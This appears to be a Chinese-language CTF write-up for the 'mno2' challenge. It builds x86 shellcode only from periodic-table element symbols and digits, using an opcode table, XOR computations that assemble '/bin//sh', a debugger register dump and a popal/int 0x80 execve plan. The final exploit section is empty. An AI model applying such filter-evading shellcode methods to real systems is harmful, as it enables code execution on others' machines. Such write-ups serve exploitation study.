…shellcode被玩坏了… 这题是用数字和元素周期表的内容写shellcode… 做的时候感觉有时候判定有问题…最好不要拿数字去充填…有时候会出错… 做完之后再也不想碰这题…

ele=['\x48','\x48\x65','\x4C\x69','\x42\x65','\x42','\x43','\x4E','\x4F','\x46','\x4E\x65','\x4E\x61','\x4D\x67','\x41\x6C','\x53\x69','\x50','\x53','\x43\x6C','\x41\x72','\x4B','\x43\x61','\x53\x63','\x54\x69','\x56','\x43\x72','\x4D\x6E','\x46\x65','\x43\x6F','\x4E\x69','\x43\x75','\x5A\x6E','\x47\x61','\x47\x65','\x41\x73','\x53\x65','\x42\x72','\x4B\x72','\x52\x62','\x53\x72','\x59','\x5A\x72','\x4E\x62','\x4D\x6F','\x54\x63','\x52\x75','\x52\x68','\x50\x64','\x41\x67','\x43\x64','\x49\x6E','\x53\x6E','\x53\x62','\x54\x65','\x49','\x58\x65','\x43\x73','\x42\x61','\x4C\x61','\x43\x65','\x50\x72','\x4E\x64','\x50\x6D','\x53\x6D','\x45\x75','\x47\x64','\x54\x62','\x44\x79','\x48\x6F','\x45\x72','\x54\x6D','\x59\x62','\x4C\x75','\x48\x66','\x54\x61','\x57','\x52\x65','\x4F\x73','\x49\x72','\x50\x74','\x41\x75','\x48\x67','\x54\x6C','\x50\x62','\x42\x69','\x50\x6F','\x41\x74','\x52\x6E','\x46\x72','\x52\x61','\x41\x63','\x54\x68','\x50\x61','\x55','\x4E\x70','\x50\x75','\x41\x6D','\x43\x6D','\x42\x6B','\x43\x66','\x45\x73','\x46\x6D','\x4D\x64','\x4E\x6F','\x4C\x72','\x52\x66','\x44\x62','\x53\x67','\x42\x68','\x48\x73','\x4D\x74','\x44\x73','\x52\x67','\x43\x6E','\x46\x6C','\x4C\x76']
ele+=['1','2','3','4','5','6','7','8','9','0']

思路

我是一个一个…试过去…数字组合当时没有想到..做得好辛苦i

'''
[H]      dec eax			0x47
[He]	   would not be used
[B]      inc edx			0x42
[C]      inc ebx			0x43
[N]      dec esi			0x4e
[O]      dec edi			0x4f
[F]      inc esi			0x46
[Ne]	   would not be used
[P]      push eax			0x50			
[S]      push ebx			0x53
[K]      dec ebx			0x4a
[Fe]	   would not be used
[I]      dec ecx			0x48
[U]      push ebp			0x55
[Y]      pop ecx			0x59
[Ba]     inc edx;popa			0x4261
[V]      push esi			0x56
[W]      push edi			0x57
[Bhxxxx] inc edx;push bytes
[Phxxxx] push esp;push 4bytes

[XeFN]   pop eax;gs inc esi;dec esi
[PdFN]	 push eax;inc esi;dec esi
[GeFN]   inc edi;gs inc esi;dec esi
[TeFN]   push esp;gs inc esi;dec esi
[ReFN]   push edx;gs inc esi;dec esi
[Rfx]	 push edx;inc ?x;


[07]     xor BYTE PTR [edi],dh
[26]     xor dh,BYTE PTR [esi]
[30]     xor esi,DWORD PTR [eax]
[32]     xor esi,DWORD PTR [edx]
[38]     xor edi,DWORD PTR [eax]

['H', 'He', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'P', 'S', 'K', 'V', 'Fe', 'Ge', 'Se', 'Y', 'Rh', 'Pd', 'Cd', 'Te', 'I', 'Xe', 'Ce', 'Nd', 'Gd', 'W', 'Re', 'Th', 'U', 'Md', 'Bh']
'''

/bin/sh

如果我需要0x73的7我就需要n^n^7 or 6^3(6必须自己提供所以没办法1^2所以不行)只能 n^n^7

泪流满面..被yi和磷拯救了...
所以A:`PsOO`,B:`YB00`,C:`aBPP`...试试看
```python
In [325]: b='YB00'

In [326]: a='PsOO'

In [327]: c='aBPP'

In [328]: for x in range(4):
    print(chr(ord(a[x])^ord(b[x])^ord(c[x])))
   .....:     
h
s
/
/
#ESI  0x68732f2f ('//sh')

然后去弄/bin 发现0x69,0x62,0x6e都不能由一字节长度的元素组成..直接拿B开头的元素来试

In [353]: hex(ord('i'))
Out[353]: '0x69'

In [354]: chr(0x57)
Out[354]: 'W'

In [355]: chr(0x50)
Out[355]: 'P'

A:iB??B:W???C:P??? 第二字节如法炮制 {'4', 'B', 'Y'} A:iBI4B:WiBYC:PBiB ….得到/bin/sh的我眼泪也掉下来..

─────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────
 EAX  0xff9b8530 ◂— 0x50426942 ('BiBP')
 EBX  0x0
 ECX  0x0
 EDX  0x804892e ◂— add    byte ptr [ebx + 0x65], al
 EDI  0x6e69622f ('/bin')
 ESI  0x68732f2f ('//sh')
 EBP  0xff9b8588 ◂— 0x0
 ESP  0xff9b8530 ◂— 0x50426942 ('BiBP')
 EIP  0x324f6ede ◂— push   esi /* 0x65545756; 'VWTeFNVVVVBa' */

坐到后面发现我们只能用popal来使得ebx—>/bin/sh 所以我研究了一下pop all的顺序

EDI
ESI
EBP
?
EBX-->xxxx-->/bin/sh
EDX-->0
ECX-->0
EAX-->0xb

int 0x80

[26]     xor dh,BYTE PTR [esi]
[07]     xor BYTE PTR [edi],dh

然后set esi edi 为我们可以控制的地方例如0x324f6f43… 然后我们利用26,07… 所以我们又开始凑 A:0x?? B:0x?? C:0x88 目标是A^B^C==0xcd和0x80 因为第二个字节受前一个字节的约束所以我们先弄第二个字节

0x80

In [452]: chr(0x43)
Out[452]: 'C'

In [453]: chr(0x4b)
Out[453]: 'K'

In [454]: hex(0x4b^0x43)
Out[454]: '0x8'

mno2

思路

/bin/sh

int 0x80

0x80

0xcd

exp